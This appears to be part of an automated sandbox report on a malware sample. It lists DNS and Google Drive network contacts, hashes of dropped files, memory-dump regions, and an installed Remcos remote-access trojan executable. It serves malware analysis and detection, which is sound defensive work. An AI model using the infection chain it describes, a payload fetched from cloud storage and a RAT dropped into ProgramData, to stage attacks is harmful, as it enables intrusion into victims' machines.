US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
GB 172.217.169.78:443 drive.google.com tcp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.73.50.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 6b827d3db185d7683eece97f29608086
SHA1 c26adfa0a2e298673b02ca7ed747f1281657bdfd
SHA256 15bf13a624857d8e263a658d6688d9d0e257f09c581cc32563a1a6c3cbaf4e5a
SHA512 f591badab95d54d92f45c898f61468fee966a388a957d16a73f2930ed89c3b50800665e253f1788b8ffc34a28c648c9c029f13513f69e3232d1c0cbcf51a30cf

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 02d3621170328d431b0d1b4382f6b750
SHA1 28347d6cfe6ab8d7032ddb0b862d7879a603378f
SHA256 11aa94a85ff8c5d62898bfaeebdf51cebe6f90ecc7ca16186bf5dd7981e92f3f
SHA512 9d369372eb24faa040caae8ad03de149e60c29e666082135428650a2458044ae85d0c9d51cb0f09379fed820313f2382001ebc6c70b83c1bd36404f12bf322fe

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 3408c92b1edcdf2e31c4f9076a21bae4
SHA1 09e67dea8d38e82a938e442a3c99f0044abbbbc9
SHA256 bd08e4f51616ca4aeaf10e2ed9df98110d3b38423888a1b1ead05b98a8314cd9
SHA512 260832080bf9ec7cf6bb23682e4ba3d63bdc671c651285fc6e70c666fd2e6a5b36170e0975d76e685ceec746e4b433dfc3035289d86433af5e3ed1d45defbcb1

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 ca4c8df5eb36d7c8dddb27a212c85586
SHA1 d57b2a5fc431ec0231474a1b350ff7cea5e27117
SHA256 51a31a08293bf252e2db254bbc96725d917bc351754bfca36e383f5f73dd13aa
SHA512 eb6bf857045bd2ecedd15104cf4e25c4853eecc99fe3973a4853b466f0691f4aed9d708cb1b987609c3660f58e8cca1d84c24c10e1726468f43d032fa356cb7f

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 22e79aa7aa0322451169b0f596317371
SHA1 fffac880e9b0924315671291d729587dd489e753
SHA256 26c664aac237da4c835aed3fe7c42924cf7321a05b1c2fc867ae85d05311345d
SHA512 3a1a864cb569e6fc6253c00970838fb8ba2eb6f7d73ec359b41314c1bed7db1ee523203b099f451d805cad94da8381364b50cbc4dd34183b81197b62ffd4e699

memory/3424-265-0x0000029EB2630000-0x0000029EB2652000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5enbizqc.g4e.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3424-266-0x00007FFFA84D0000-0x00007FFFA8F91000-memory.dmp

memory/3424-268-0x0000029E98760000-0x0000029E98770000-memory.dmp

memory/3424-267-0x0000029E98760000-0x0000029E98770000-memory.dmp

memory/3424-269-0x0000029EB2A00000-0x0000029EB2A26000-memory.dmp

memory/3424-270-0x0000029EB2A50000-0x0000029EB2A64000-memory.dmp

memory/1096-271-0x0000000074E80000-0x0000000075630000-memory.dmp

memory/1096-273-0x0000000002550000-0x0000000002560000-memory.dmp

memory/1096-272-0x0000000002500000-0x0000000002536000-memory.dmp

memory/1096-274-0x0000000004FF0000-0x0000000005618000-memory.dmp

memory/1096-275-0x0000000004F60000-0x0000000004F82000-memory.dmp

memory/1096-276-0x0000000005690000-0x00000000056F6000-memory.dmp

memory/1096-277-0x0000000005700000-0x0000000005766000-memory.dmp

memory/1096-287-0x0000000005870000-0x0000000005BC4000-memory.dmp

memory/1096-288-0x0000000005EC0000-0x0000000005EDE000-memory.dmp

memory/1096-289-0x0000000005F00000-0x0000000005F4C000-memory.dmp

memory/3424-290-0x00007FFFA84D0000-0x00007FFFA8F91000-memory.dmp

memory/3424-291-0x0000029E98760000-0x0000029E98770000-memory.dmp

memory/3424-292-0x0000029E98760000-0x0000029E98770000-memory.dmp

memory/1096-293-0x0000000007530000-0x0000000007BAA000-memory.dmp

memory/1096-294-0x00000000064C0000-0x00000000064DA000-memory.dmp

memory/1096-295-0x0000000007180000-0x0000000007216000-memory.dmp

memory/1096-296-0x0000000007110000-0x0000000007132000-memory.dmp

memory/1096-297-0x0000000008160000-0x0000000008704000-memory.dmp

memory/1096-298-0x00000000070E0000-0x0000000007102000-memory.dmp

memory/1096-299-0x00000000073B0000-0x00000000073C4000-memory.dmp

memory/3424-300-0x0000029E98760000-0x0000029E98770000-memory.dmp

memory/1096-301-0x0000000002550000-0x0000000002560000-memory.dmp

memory/1096-302-0x0000000007C70000-0x0000000007C71000-memory.dmp

memory/1096-303-0x0000000008710000-0x000000000B9CB000-memory.dmp

memory/1096-304-0x0000000008710000-0x000000000B9CB000-memory.dmp

memory/1096-305-0x0000000074E80000-0x0000000075630000-memory.dmp

memory/1096-307-0x0000000002550000-0x0000000002560000-memory.dmp

memory/1096-308-0x00000000778A1000-0x00000000779C1000-memory.dmp

memory/3440-309-0x00000000024A0000-0x000000000575B000-memory.dmp

memory/1096-310-0x0000000002550000-0x0000000002560000-memory.dmp

memory/1096-311-0x0000000008710000-0x000000000B9CB000-memory.dmp

memory/3440-312-0x0000000001240000-0x0000000002494000-memory.dmp

memory/3440-313-0x00000000778A1000-0x00000000779C1000-memory.dmp

memory/3440-314-0x0000000077928000-0x0000000077929000-memory.dmp

C:\ProgramData\Remcos\remcos.exe

MD5 251e51e2fedce8bb82763d39d631ef89
SHA1 677a3566789d4da5459a1ecd01a297c261a133a2
SHA256 2682086ace1970d5573f971669591b731f87d749406927bd7a7a4b58c3c662e9
SHA512 3b49e6d9197b12ca7aa282707d62496d9feac32b3f6fd15affd4eaaa5239da903fadd4600a1d17a45ec330a590fc86218c9a7dc20306b52d8170e04b0e325521

memory/3440-330-0x00000000778A1000-0x00000000779C1000-memory.dmp

memory/3440-379-0x0000000001240000-0x0000000002494000-memory.dmp

memory/3440-327-0x00000000024A0000-0x000000000575B000-memory.dmp

memory/1096-381-0x0000000074E80000-0x0000000075630000-memory.dmp

memory/3440-380-0x0000000001240000-0x0000000002494000-memory.dmp

memory/3440-382-0x0000000001240000-0x0000000002494000-memory.dmp

memory/3440-393-0x0000000001240000-0x0000000002494000-memory.dmp

memory/1096-394-0x0000000008710000-0x000000000B9CB000-memory.dmp

memory/3440-395-0x0000000001240000-0x0000000002494000-memory.dmp

memory/3440-392-0x00000000024A0000-0x000000000575B000-memory.dmp

memory/3440-398-0x0000000001240000-0x00000000012C2000-memory.dmp

memory/3440-397-0x0000000001240000-0x0000000002494000-memory.dmp

memory/3440-401-0x0000000001240000-0x00000000012C2000-memory.dmp

memory/3440-402-0x0000000001240000-0x00000000012C2000-memory.dmp

memory/3424-403-0x00007FFFA84D0000-0x00007FFFA8F91000-memory.dmp

memory/3440-405-0x0000000001240000-0x00000000012C2000-memory.dmp

memory/3440-404-0x0000000001240000-0x0000000002494000-memory.dmp

memory/3440-406-0x0000000001240000-0x00000000012C2000-memory.dmp

memory/3440-407-0x0000000001240000-0x0000000002494000-memory.dmp

memory/3440-408-0x0000000001240000-0x0000000002494000-memory.dmp

memory/3440-409-0x0000000001240000-0x0000000002494000-memory.dmp

memory/3440-411-0x0000000001240000-0x00000000012C2000-memory.dmp